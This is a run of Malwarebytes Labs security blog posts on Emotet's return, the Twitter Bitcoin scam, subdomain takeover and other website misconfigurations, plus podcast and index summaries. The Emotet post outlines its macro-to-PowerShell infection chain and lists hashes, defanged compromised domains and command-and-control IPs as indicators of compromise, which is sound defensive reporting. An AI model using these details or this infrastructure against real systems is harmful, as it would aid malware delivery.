9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846
5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46

The post Chinese APT group targets India and Hong Kong using new variant of MgBot malware appeared first on Malwarebytes Labs.

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst for Malwarebytes, about Bluetooth and beacon technology.

Last month, cybersecurity experts warned the public about the data collection embedded in the Donald Trump 2020 re-election campaign’s mobile app. Once downloaded, the app requests broad access to user information, including device contacts, rough location, device storage, ID, call information, Bluetooth pairing, and more.

Tune in to hear about the progression of Bluetooth technology, how the tech is used in online advertising today, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Stalkerware advertising ban by Google. A step in the right direction, but there is more that needs to be done.
• Website misconfigurations and other errors that open up an avenue for attackers to abuse your site.
• A coordinated social engineering attack left Twitter in turmoil. Attackers used high profile Twitter accounts to get rich quick.
• The return of Emotet.

Plus other cybersecurity news:

• Google Cloud launches Confidential VMs, a new type of virtual machine that makes use of the company’s work around confidential computing to ensure that data isn’t just encrypted at rest but also while it is in memory. (Source: TechCrunch)
• The GoldenHelper malware found in China-mandated software is even more extensive than originally thought. (Source: ArsTerchnica)
• The Atlas of Surveillance shows which tech law enforcement agencies across the country have acquired. It’s a sobering look at the present-day panopticon. (Source: Wired)
• The Cybersecurity and Infrastructure Security Agency (CISA) told federal agencies to patch wormable Windows DNS bug in 24 hours. (Source: BleepingComputer)
• Blackrock is Android banking malware that can steal information from an estimated 337 apps, including Amazon, Facebook, Gmail and Tinder. (Source: Tom’s Guide)

Stay safe, everyone!

The post Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd appeared first on Malwarebytes Labs.

No country, business, or person is immune to cybercrime, and as the Internet’s influence on our daily lives grows exponentially, so will the level of malicious activity throughout the world.

An ever-changing cyber landscape will always carry with it new threats, but are they the same for everyone? Who is attacked most often? Who is most at risk? And who is most exposed to cybercrime?

From endpoint attacks that are designed to gain unauthorized access, steal data, and extort money to cloud hacks that compromise and weaponize virtual machines, cybercrime can take many forms. And while new waves of threats evolve, cybersecurity hygiene doesn’t always follow suit.

There will always be a risk of falling victim to cybercrime, but it is important to remember that the very nature of risk can be boiled down to the chance that an event or situation will happen. A person, organization, or city could be at risk of an attack, but if they are prepared to defend against it, the situation is less dire.

Exposure, on the other hand, assumes an entity is subject to risk from a harmful action and, more importantly, that the entity will be negatively impacted by that risk.

Therefore, PasswordManagers.co chose to research the frequency of malicious attacks alongside the level of cybersecurity commitment across 108 countries to shine a spotlight on each country’s exposure to cybercrime.

Who is most exposed to cybercrime?

With a rating system from 0 to 1, the Cybersecurity Exposure Index calculates the level of exposure to cybercrime by country. The higher the score, the higher the exposure.

The post How exposed are you to cybercrime? appeared first on Malwarebytes Labs.

It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.

The Emotet botnets started pushing malspam actively on Friday, July 17, using the same techniques as it employed previously. Malicious emails contain either a URL or an attachment. One familiar technique is for the document to be sent as a reply within existing email threads.

The document contains a heavily obfuscated macro:

Once the macro is enabled, WMI launches PowerShell to retrieve the Emotet binary from one of the remote compromised websites. It will iterate through a list until it identifies one that is responding.

Once the payload is executed, it will send a confirmation back to one of Emotet’s command and control server.

Emotet has returned to its old tricks

The Emotet Trojan was by far the most visible and active threat on our radars in 2018 and 2019—right up until it went into an extended break.

Emotet is used by cybercriminals as the initial entry point, followed by a dwell time that can last days or weeks. In the meantime, other threats such as TrickBot can be delivered as a secondary payload.

The real damage that an Emotet compromise causes happens when it forms alliances with other malware gangs and in particular threat actors interested in dropping ransomware.

Malwarebytes users were already protected against Emotet thanks to our signature-less anti-exploit technology.

We also detect the Emotet binary as a standalone file:

Indicators of Compromise

Malicious documents

5d2c6110f2ea87a6b7fe9256affbac0eebdeee18081d59e05df4b4a17417492b
4fdff0ebd50d37a32eb5c3a1b2009cb9764e679d8ee95ca7551815b7e8406206
bb5602ea74258ccad36d28f6a5315d07fbeb442a02d0c91b39ca6ba0a0fe71a2
6d86e68c160b25d25765a4f1a2f8f1f032b2d5cb0d1f39d1d504eeaa69492de0
18fab1420a6a968e88909793b3d87af2e8e1e968bf7279d981276a2aa8aa678e
d5213404d4cc40494af138f8051b01ec3f1856b72de3e24f75aca8c024783e89

Compromised sites

elseelektrikci[.]com
rviradeals[.]com
skenglish[.]com
packersmoversmohali[.]com
tri-comma[.]com
ramukakaonline[.]com
shubhinfoways[.]com
test2.cxyw[.]net
sustainableandorganicgarments[.]com
staging.icuskin[.]com
fivestarcleanerstx[.]com
bhandaraexpress[.]com
crm.shaayanpharma[.]com
zazabajouk[.]com
e2e-solution[.]com
topgameus[.]com
cpads[.]net
tyres2c[.]com
thesuperservice[.]com
ssuse[.]com

Emotet binaries

454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
d51073eef56acf21e741c827b161c3925d9b45f701a9598ced41893c723ace23
1368a26328c15b6d204aef2b7d493738c83fced23f6b49fd8575944b94bcfbf4
7814f49b3d58b0633ea0a2cb44def98673aad07bd99744ec415534606a9ef314
f04388ca778ec86e83bf41aa6bfa1b163f42e916d0fbab7e50eaadc8b47caa50

C2s

178.210.171[.]15
109.117.53[.]230
212.51.142[.]238
190.160.53[.]126

The post It’s baaaack: Public cyber enemy Emotet has returned appeared first on Malwarebytes Labs.

“I’m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!”

This and similar Tweets asking readers to send US$1,000 to a Bitcoin address with the promise of a double return payment went out yesterday.

Too good to be true?

Once again, social engineering has been demonstrated to be a powerful attack vector. Who would fall for such a ruse, you may ask? Looking at the traffic on said Bitcoin address, more than 100 people were duped.

The victims that sent Bitcoin to this address probably do not feel so good about themselves right now. But in their defense, some of the accounts that were Tweeting out these messages were trusted figures with verified Twitter accounts. To name a few: Elon Musk, Bill Gates, Barack Obama, Kanye West, Warren Buffet, Jeff Bezos, Joe Biden, and many other high-profile accounts were taken over.

What happened?

The official Twitter Support account states that their investigation is still ongoing, but it has revealed that threat actors gained unauthorized access and used it to take control of many highly-visible (including verified) accounts and Tweet on their behalf.

From other sources we learned that the threat actors managed to use social engineering on a Twitter employee to gain access to their control panel. Through the employee panel, they were able to change associated email addresses for many accounts to addresses under their control. They then used that as a means to reset the password for the account and disable 2FA.

During the ongoing Twitter storm of misleading Tweets, Twitter Support locked down the affected accounts and removed Tweets posted by the attackers as fast as they could find them. They also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised) during the investigation.

What should I do?

If you think you might be the owner of an affected account, you should:

• Not feel bad because this one was not on you
• Check if the address listed under email is yours
• Reset and change your password
• Enable 2FA

All these settings can be found when you are logged in on Twitter under More > Settings and privacy. Another setting that is worth considering is the Password reset protect which can be found under Additional password protection. Even though it probably would not have helped against this attack, it might help if you get a test or email when someone requests a password reset on your account. In this case, I’m pretty sure the employee panel would have allowed the attackers to disable that option as well.

Can victims retrieve Bitcoin?

Unfortunately, it is virtually impossible to get back stolen Bitcoin from the attackers. They are probably laundering the money right now. They will use Bitcoin mixing services to hide where the Bitcoin came from and Bitcoin exchange services to anonymously convert Bitcoin into spendable money.

The best move now is to scrutinize each and every request for donations, payments, or services—whether you know the person or not. Social engineering is a trick as old as time, and the reason it’s still so popular is that it still works.

Stay vigilant and stay safe, everyone!

The post Coordinated Twitter attack rakes in 100 grand appeared first on Malwarebytes Labs.

Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want to tempt fate, you can bring on the mayhem with website misconfigurations and other ill-fortuned security and privacy errors.

In the last week, we’ve seen a few of these website mistakes go public, so we wanted to give site owners a gentle reminder to watch out for easily avoidable, but even easier to walk into—and pay the piper afterwards—errors.

Spoiler alert: Do not pay the piper.

Paying the piper: Salacious subdomains

Subdomains are a great way to add depth to your website, branching off from the main domain and allowing for content categorization. They can help make huge, unwieldy portals a little more manageable.

Problems arise when someone creates a bunch of complicated subdomains resolving to different places, and they later fall into a state of abandonment, as was the case with several mega-corporations, including Chevron, the Red Cross, and Getty Images. This unfortunately leads to issues the subdomains were never intended to address.

Opportunists took note of the sheer number of abandoned official subdomains and figured out a way to game the Azure system powering everything behind the scenes. If you didn’t know, Azure is Microsoft-powered cloud technology with a big splash of virtualisation thrown into the mix. 

What did they do?

I’ll give you a straightforward, non-Azure related example. You set up a website, yourwebsite(dot)com. You don’t want to bother with managing hosting and all the nitty-gritty that comes with it, so you point your URL at a website hosted on a free platform. Let’s go with yourwebsite(dot)freebloggingplatform(dot)com.

After a while, you become bored with your website and it falls into disrepair. You haven’t touched it in months, but someone got their hands on the blog the URL was pointing at, compromised it, and turned it into a horrendous pornography spam farm.

Imagine something similar with Azure, except instead of a straightforward top-level domain (the landing page for your website), you created lots of subdomains like myfavouritemovies(dot)yourwebsite(dot)com and myfavouritebooks(dot)yourwebsite(dot)com.

Each of these subdomains pointed to hosted webspace on Azure, and when the organisation no longer needed the hosted space, it was released back into the wild for anybody else to grab. Unfortunately, someone in admin land forgot to stop pointing the subdomain(s) at the now relinquished Azure pages and it’s at this point the scammers swoop in.

Congratulations, website owner: You now have a forgotten-about subdomain with a good search engine page rank pointing at newly-created spam/porn/drugs/who-knows-what content.

It’s not just spam and dodgy deals you must be wary of. You could find yourself pointing your website at phishing scams, or malware installs, or potentially illegal content. It might be used for cookie harvesting or any number of awful Internet shenanigans you don’t want to get tangled up in.

You could easily be directed to a site playing host to credit card skimmers.

These so-called “dangling DNS entries” now have a support page over on the Microsoft portal, and it’s well worth a read if you expect to be managing subdomains in the near future. These kinds of attacks are almost certainly automated, so you can expect your org to be caught up if some spare subdomains are left out in the cold waving a large “please hijack me” sign.

Keep your subdomains safe, register your domains in Google Search Console, and make sure your big list of DNS antics are on an actual list. Here are some more tips on how to fix a subdomain takeover, if you’re interested.

Paying the piper: Any road is code

A CDN is a content delivery/distribution network. They’re the bits and pieces of the Internet tapestry theoretically close to where you’re located, with the task of bypassing bottlenecks and hurling content in your direction faster than it would’ve arrived otherwise.

And now, for the somewhat more cynical take: If you’ve ever loaded up a website and marveled at how slow the content was but how fast the 26 adverts were, loading before the site did: That’s the wonder of a decent CDN.

Anyway.

CDNs can be used to serve up various bits and pieces of a site as and when required. It’s not uncommon for chunks of code to be pumped into the page from multiple sources, but you must offset that against the risk of the site breaking.

But what if the CDN has been serving up bad files and finds itself on a block list? What if it simply fails to load and breaks the website’s functionality? There are all sorts of things that can go wrong with that kind of setup.

What happened?

Something you probably wouldn’t expect to see is a major bank using the Internet Archive as a CDN resource. The Internet Archive is where old websites and other content live on, and it’s tremendously helpful for archival purposes. 

For some peculiar reason, Barclays bank was linking directly to an archived page to serve up their own JavaScript code. Barclays have no control over the content hosted on the Internet Archive, and if someone managed to tamper with the code, it could give banking customers quite the headache (or the site could simply lose functionality if Internet Archive went down or the page was removed for whatever reason).

Now I’m thinking back—again—to the various caveats and requirements banks place on customers to make sure they’re doing their due diligence. How would banking customers have any idea about this going on under the hood if it ended up causing them some sort of security issue? Would suspicion first fall upon the customer? How would they prove they weren’t to blame for something going wrong?

Sometimes organisations lose bits of code and have no backups. I don’t think that’s likely in this case, but if you don’t want to end up in a similar situation and start grabbing files/links from somewhere like Internet Archive, please make backups. (And check where, exactly, you’re copying and pasting code from.)

Paying the piper: breaking down the breakdowns

Those are just two of the most recent examples of website mishaps that can lead to malicious takeovers or simply result in an inability to function. Those aren’t the only ways for things to go wrong, though. What else should you be looking out for and doing?

Update, update, update. If you don’t, people could bludgeon their way into your content management system/blogging platform and stuff the site with SEO spam. If your site ends up in the news for an unrelated reason, you could inadvertently drive lots of visitors to potentially bad places.

Think about all those credentials you have tied to your platforms. Is everybody listed still working at your organisation? Or do you have lots of insecure admin accounts with basic passwords scattered about the place?

Has the platform you use to power your blog been abandoned? If it’s no longer updated, you could well receive a visit from the website hack inspector. Even the biggest organisations are not immune to the perils of platform mishaps. You’ll never know the impact until everything is already burning away in some sort of digital firestorm.

It may well be worth drawing up a short digital to-do list and giving your site an inspection, because so many intrictate moving parts almost demand the wheels coming off at some point. Get ahead of the curve, throw on your welding goggles, and give that site of yours the tuneup inspection of a lifetime.

The post Website misconfigurations and other errors to avoid appeared first on Malwarebytes Labs.